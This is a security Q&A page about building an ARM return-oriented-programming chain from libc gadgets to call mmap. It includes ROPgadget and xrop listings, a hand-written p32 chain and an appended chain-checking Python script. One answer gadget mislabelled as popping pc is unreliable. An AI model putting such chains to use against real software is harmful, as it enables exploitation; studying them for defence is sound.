ROP programming / exploitation on ARM - gadget chain

7

Unfortunately, I can't find this gadget in my libc.so. How can we reprogram this using different instructions?

pop {r0, r1, r2, r3, pc}

Which instructions will achieve the same thing? Which gadgets do I have to look for?

It relates to this exploit:

# pivot swaps stack then returns to pop {pc}
  page += p32(pop_r0_r1_r2_r3_pc)

Thanks,

Update:

These gadgets are available in my libc.so:

Which tool is better, ROPgadget or xrop? xrop definitely showed more gadgets.

ROPgadget --binary libc.so --ropchain --only "pop"
Gadgets information
============================================================
0x0001061c : pop {r0, pc}
0x00042664 : pop {r1, pc}
0x00042d00 : pop {r3, pc}
0x0000f7dc : pop {r4, pc}
0x00041658 : pop {r4, r5, pc}
0x0004198c : pop {r4, r5, r6, pc}
0x00042c2c : pop {r4, r5, r6, r7, pc}

And using xrop:

Usage: xrop [-r arch] [-b bits] [-e bytes] [-l endian] [-a relocaddr] [-s regex] [-v] [-h] inputfile
     -b (16 | 32 | 64) sets the processor mode
     -r (arm | mips | powerpc | x86) raw binary file of given architecture
     -v displays the version number
     -l (b | e) big or little endian
     -e skips <bytes> of header
     -a rellocate at given address
     -n disable colors in the output
     -s filter gadgets with <regex>
     -h prints this menu

$ ./xrop -r arm -b 32 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________

$ ./xrop -r arm -b 64 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________
    
asked by android_dev 28.09.2015 - 21:26

1 answer

2

I didn't take a long look, but using the result 1 + 0x59554 : pop {r0, r1, r2, r6} from xrop and the result 0x00042d00 : pop {r3, pc} from ROPgadget, have you tried placing this in your ROP stack?

page += p32(pop_r0_r1_r2_r6_pc) #xrop result with loaded offset
page += p32(r0_popval)  #r0 - mmap() address in exploit.
page += p32(r1_popval)  #r1 - size in exploit.
page += p32(r2_popval)  #r2 - protection in exploit.
page += p32(r6_popval)  #r6 - 0x66666666 looks just like recognizable junk.
page += p32(pop_r3_pc)  #ROPgadget result with loaded offset
page += p32(r3_popval)  #r3 - flags for mmap in exploit.
page += p32(mmap64_address)     #for popping into pc to call mmap64(). 

I imagine it would do fine if they are valid gadgets. Also consider looking for Thumb gadgets if you have decent gadgets for branching and switching between modes.

I've been learning similar material, for which ROPgadget has been fine, but I'd suggest using whichever one has more features ready to do what you need to do faster. I would love, for instance, automated ARM chain generation in ROPgadget, but it isn't a feature.

    
answered by dreamist 17.03.2017 - 05:52
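As an added illustration (not code from the question, the answer, ROPgadget or xrop), the Python script below parses gadget listings in the two formats quoted above, handles xrop's `1 + 0x...` notation for Thumb gadgets (on ARM the low bit of a branch target selects Thumb mode, so that bit has to be set in the chain entry, which is why the answer's `pop_r0_r1_r2_r6_pc` is described as an xrop result "with loaded offset"), and checks a proposed sequence of pop gadgets for the two things that silently break a chain: a gadget whose pop list lacks `pc` (control never reaches the next stack entry) and a gadget with a condition-code suffix such as `popeq` or `popcc` (it only executes when the flags happen to match). `layout` reproduces the word order of the answer's hand-written chain and `to_bytes` does what `p32` does per word. The sample listing lines are constructed from addresses in the thread; the register values, the 0x66666666 filler and the 0xdeadbeef final target are placeholders.

```python
import re
import struct
from dataclasses import dataclass

# Constructed sample listing: one line in each of the two formats quoted in the
# question. ROPgadget prints "0xADDR : instr"; xrop prints "ADDR  instr" and
# prefixes Thumb-mode gadgets with "1 + " (the Thumb bit of the branch target).
SAMPLE_LISTING = """
0x00042d00 : pop {r3, pc}
0x0001061c : pop {r0, pc}
1 + 0x59554             pop {r0, r1, r2, r6}
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
"""

COND_CODES = "eq|ne|cs|cc|mi|pl|vs|vc|hi|ls|ge|lt|gt|le"   # ARM condition suffixes
ROPGADGET_RE = re.compile(r"^(0x[0-9a-f]+)\s*:\s*(.+)$", re.I)
XROP_RE = re.compile(r"^(1\s*\+\s*)?(0x[0-9a-f]+)\s+(.+)$", re.I)
POP_RE = re.compile(rf"^pop({COND_CODES})?\s*\{{([^}}]*)\}}$")
FILLER = 0x66666666   # placeholder: recognizable junk for registers the chain ignores


@dataclass(frozen=True)
class Gadget:
    addr: int      # address as the tool prints it, without the Thumb bit
    thumb: bool
    cond: str      # condition suffix ("eq", "cc", ...) or "" when unconditional
    regs: tuple    # registers in the pop list, in the order the tool printed them

    @property
    def chain_addr(self):
        """The word to put on the stack: odd for Thumb (xrop's "1 + "), even for ARM."""
        return self.addr | 1 if self.thumb else self.addr

    @property
    def returns_via_pc(self):
        return "pc" in self.regs


def parse_listing(text):
    """Extract pop gadgets from ROPgadget- or xrop-style listing lines."""
    gadgets = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        thumb = False
        m = ROPGADGET_RE.match(line)
        if m:
            addr_s, ins = m.groups()
        else:
            m = XROP_RE.match(line)
            if not m:
                continue
            prefix, addr_s, ins = m.groups()
            thumb = prefix is not None
        pm = POP_RE.match(" ".join(ins.split()))   # collapse the tool's column padding
        if not pm:
            continue
        regs = tuple(r.strip() for r in pm.group(2).split(","))
        gadgets.append(Gadget(int(addr_s, 16), thumb, pm.group(1) or "", regs))
    return gadgets


def check_chain(gadgets, needed):
    """Report registers in `needed` that no gadget sets, and gadgets that would not
    pass control on: a pop without pc, or a conditional pop (popeq, popcc, ...)."""
    set_regs, problems = set(), []
    for i, g in enumerate(gadgets):
        set_regs.update(r for r in g.regs if r != "pc")
        if g.cond:
            problems.append(f"gadget {i} ({g.chain_addr:#x}) is conditional: pop{g.cond}")
        if not g.returns_via_pc:
            problems.append(f"gadget {i} ({g.chain_addr:#x}) does not pop pc")
    return {"missing": sorted(set(needed) - set_regs), "problems": problems}


def layout(gadgets, values, final_target):
    """Stack words for the chain, in the order the answer lays them out by hand:
    first gadget address, then one value per popped register, then the pc slot
    holding the next gadget's address (or `final_target` after the last one)."""
    report = check_chain(gadgets, values)
    if report["problems"]:
        raise ValueError("; ".join(report["problems"]))
    words = [gadgets[0].chain_addr]
    for i, g in enumerate(gadgets):
        words.extend(values.get(r, FILLER) for r in g.regs if r != "pc")
        words.append(gadgets[i + 1].chain_addr if i + 1 < len(gadgets) else final_target)
    return words


def to_bytes(words):
    """Little-endian 32-bit packing, i.e. what p32() does for each word."""
    return struct.pack("<%dI" % len(words), *words)


if __name__ == "__main__":
    gs = parse_listing(SAMPLE_LISTING)
    for g in gs:
        print(f"{g.chain_addr:#x} thumb={g.thumb} cond={g.cond!r} regs={g.regs} pc={g.returns_via_pc}")
    # Placeholder register values; 0xdeadbeef stands in for the final call target.
    chain = [gs[3], gs[0]]
    print(check_chain(chain, ["r0", "r1", "r2", "r3"]))
    print([hex(w) for w in layout(chain, {"r0": 0x10, "r1": 0x1000, "r2": 7, "r3": 0x22}, 0xdeadbeef)])
    print(check_chain([gs[2], gs[0]], ["r0", "r1", "r2", "r3"]))
```

Run against the thread's own listings, the check flags the `1 + 0x59554` entry (no `pc` in its pop list) and the `popeq`/`popcc` entries from the ARM-mode output, while `1 + 0x6b1d4` followed by `0x42d00` covers r0-r3 with every hop ending in a pop of pc. Register order in the stack layout follows the pop list as printed, which for ARM is ascending register number with pc last.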